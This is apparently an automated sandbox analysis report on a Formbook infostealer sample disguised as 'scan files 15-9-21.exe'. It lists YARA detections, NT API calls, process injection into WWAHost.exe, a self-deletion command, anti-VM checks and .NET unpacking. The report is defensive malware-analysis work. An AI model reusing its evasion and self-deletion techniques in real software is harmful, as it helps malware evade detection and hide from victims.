          Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.316398859.000000000E0BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.520331838.0000000000870000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.342785187.0000000001600000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.520884940.0000000000A80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.521187644.0000000000B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.262326263.0000000003979000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_028530C0
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02856150
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_028530B2
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_028514FA
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02851448
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02851458
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02850D88
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02850D98
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02852DD7
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_02852DE8
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E847B0
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8804C
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8BF38
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8EACB
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E847A3
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8A100
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E88104
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00401174
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B9BD
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041BA6D
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041C31E
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041CB97
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00408C60
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041C597
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041C77C
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041BFCB
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B7E3
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00402FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0369EBB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03686E30
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03731D55
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03660D20
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03684120
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0366F900
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367D5E0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03692581
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_03721002
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367841F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036920A0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0367B090
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088CB97
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_00878C60
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_00872D87
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_00872D90
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088C597
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_00872FB0
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088B7E3
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088C77C
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: String function: 0366B150 appears 32 times
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041839A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036AA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036AA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036AA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036AAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036AB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036A98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_008881C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_008882F0 NtClose,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_00888270 NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_008883A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088826A NtReadFile,
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088839A NtAllocateVirtualMemory,
          Source: scan files 15-9-21.exe, 00000000.00000002.263517285.0000000005A70000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exe, 00000000.00000002.262075156.0000000002987000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exe, 00000000.00000002.261491768.000000000060E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exe, 00000002.00000000.260672638.000000000105E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exe, 00000002.00000002.343331105.0000000001BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exeBinary or memory string: OriginalFilenameIObserv.exe4 vs scan files 15-9-21.exe
          Source: scan files 15-9-21.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: scan files 15-9-21.exeVirustotal: Detection: 29%
          Source: scan files 15-9-21.exeReversingLabs: Detection: 26%
          Source: scan files 15-9-21.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\scan files 15-9-21.exe 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess created: C:\Users\user\Desktop\scan files 15-9-21.exe C:\Users\user\Desktop\scan files 15-9-21.exe
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scan files 15-9-21.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@10/4
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2752:120:WilError_01
          Source: scan files 15-9-21.exe, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: scan files 15-9-21.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: scan files 15-9-21.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: scan files 15-9-21.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: WWAHost.pdb source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
          Source: Binary string: WWAHost.pdbUGP source: scan files 15-9-21.exe, 00000002.00000003.335101550.0000000003940000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe, 0000000D.00000002.525382273.0000000003640000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: scan files 15-9-21.exe, 00000002.00000002.343119287.0000000001AC0000.00000040.00000001.sdmp, WWAHost.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: scan files 15-9-21.exe, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.scan files 15-9-21.exe.580000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.scan files 15-9-21.exe.fd0000.1.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.scan files 15-9-21.exe.fd0000.0.unpack, Forms/mainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8E622 push 0000001Ah; retf
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8D131 push 0000001Ah; retf
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8E8E8 push 0000001Ah; retf
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 0_2_04E8EA5C push 0000001Ah; retf
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041C949 push ecx; ret
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041C949 push ecx; ret
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0040429D pushfd ; iretd
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_036BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088C949 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088C949 push ecx; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0087429D pushfd ; iretd
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088B40B push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088B402 push eax; ret
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 13_2_0088B46C push eax; ret
          Source: scan files 15-9-21.exeStatic PE information: 0xEB59C8A3 [Mon Feb 14 13:50:27 2095 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.20919367006

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: /c del 'C:\Users\user\Desktop\scan files 15-9-21.exe'
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: scan files 15-9-21.exe PID: 6752, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: scan files 15-9-21.exe, 00000000.00000002.262067632.0000000002982000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 00000000008785E4 second address: 00000000008785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\WWAHost.exeRDTSC instruction interceptor: First address: 000000000087897E second address: 0000000000878984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6756Thread sleep time: -35907s >= -30000s
          Source: C:\Users\user\Desktop\scan files 15-9-21.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6308Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\WWAHost.exe TID: 4712Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\WWAHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeCode function: 2_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeThread delayed: delay time: 35907
          Source: C:\Users\user\Desktop\scan files 15-9-21.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.274069496.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
